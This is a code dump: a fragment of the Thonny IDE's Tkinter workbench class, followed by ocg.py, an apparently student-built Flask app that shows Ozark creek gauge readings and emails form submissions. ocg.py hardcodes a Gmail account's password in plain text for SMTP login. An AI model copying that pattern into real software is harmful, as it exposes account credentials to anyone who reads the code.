family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Update Treeview font and row height
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
treeview_font = tk_font.nametofont("TreeviewFont")
treeview_font.configure(size=treeview_font_size)
rowheight = round(treeview_font.metrics("linespace") * 1.2)
style = ttk.Style()
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
disabled_image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
if disabled_image is not None:
image_spec = [image, "disabled", disabled_image]
else:
image_spec = image
button = ttk.Button(
group_frame,
image=image_spec,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
def toolbar_handler(*args):
handler(*args)
self._update_toolbar()
if self.focus_get() == button:
# previously selected widget would be a better candidate, but this is
# better than button
self._editor_notebook.focus_set()
button.configure(command=toolbar_handler)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or (button.tester and not button.tester()):
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
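# Illustrative walk-through (the screen width is an assumption): on a
# 1366 px wide screen the presets are small=12, medium=16, large=20.
# Starting from editor_font_size 12, the toggle selects medium (16),
# grows both editor and IO fonts by +4 via _change_font_size, and resizes
# the window to min(widths[16], 1366) == 1300 px wide at its current
# position.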
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master) # type: ignore
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
if dlg.backend_restart_required:
get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception:
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") is None:  # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception:
traceback.print_exc()
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if self._editor_notebook and not self._editor_notebook.check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give an error on Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
os.remove(thonny.get_ipc_file_path())
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means an actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logging.exception("Error while destroying workbench")
finally:
try:
super().destroy()
finally:
runner = get_runner()
if runner is not None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name is not None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if (
self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS
) and view_name in self._view_records:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor is not None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when a new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
import webbrowser
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
ocg.py
|
#--------------------------------------------------------
#File Name: ocg.py
#Purpose: App router for the Ozark Creek Gauges Web App
#Author: Capstone Group 1
#Date: January 31, 2021
#Includes Templates from templated.co
#--------------------------------------------------------
from flask import Flask, request, render_template, session, redirect
import random
from scraper import scrape
import time
import threading
import smtplib
from email.message import EmailMessage
app = Flask(__name__, static_folder='static', static_url_path='/static')
#Global Variables for HTML placeholders
names = []
times = []
values = []
loading = ""
#Run the scraper and update the global placeholders once it finishes
def background():
items = scrape()
global names
names = items[0]
global times
times = items[1]
global values
values = items[2]
global loading
loading = 'none'
#Takes form data as a dictionary and emails it to the project's Gmail inbox
def writeToFile(form):
message = (
    "Type: " + form['type'] + "\n "
    + "User Name: " + form['name'] + "\n"
    + "Contact Info: " + form['contactinfo'] + "\n"
    + "River Name: " + form['rivername'] + "\n"
    + "Gauge: " + form['gauge2'] + "\n"
    + "Location: " + form['location2'] + "\n"
    + "Message: " + form['message'] + "\n"
)
msg = EmailMessage()
msg.set_content(message)
msg['Subject'] = form['rivername'] + " addition"
msg['From'] = "ozarkcreekgauges@gmail.com"
msg['To'] = "ozarkcreekgauges@gmail.com"
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login("ozarkcreekgauges", "WeLoveBoats1!")
s.send_message(msg)
s.quit()
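#Example call (hypothetical form values, shown only to illustrate the
#resulting message layout):
# writeToFile({'type': 'New gauge', 'name': 'Jane', 'contactinfo': 'jane@example.com',
#              'rivername': 'Buffalo River', 'gauge2': 'Ponca gauge',
#              'location2': 'Ponca, AR', 'message': 'Please add this gauge'})
#would email a plain-text summary ("Type: New gauge", "User Name: Jane", ...)
#with the subject "Buffalo River addition" to the project's Gmail inbox.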
#Main/Table page
@app.route('/',methods=["GET"])
@app.route('/index.html',methods=["GET"])
def index():
t1 = threading.Thread(target=background)
t1.start()
return render_template('index.html',names = names, times = times, values = values, loading=loading)
#River Map
@app.route('/map.html',methods=["POST","GET"])
def map():
return render_template('map.html')
#About Page with Changes Submission
@app.route('/about.html',methods=["POST","GET"])
def about():
return render_template('about.html')
#For submitting changes
@app.route('/submit',methods=["POST","GET"])
def submit():
writeToFile(request.form)
return redirect("/about.html")
if __name__ == "__main__":
app.run()
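#To try the app locally (assumes Flask and the scraper module's own
#dependencies are installed): run "python ocg.py" and open
#http://127.0.0.1:5000/ in a browser; the gauge table fills in once the
#background scrape thread has finished and the page is refreshed.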
|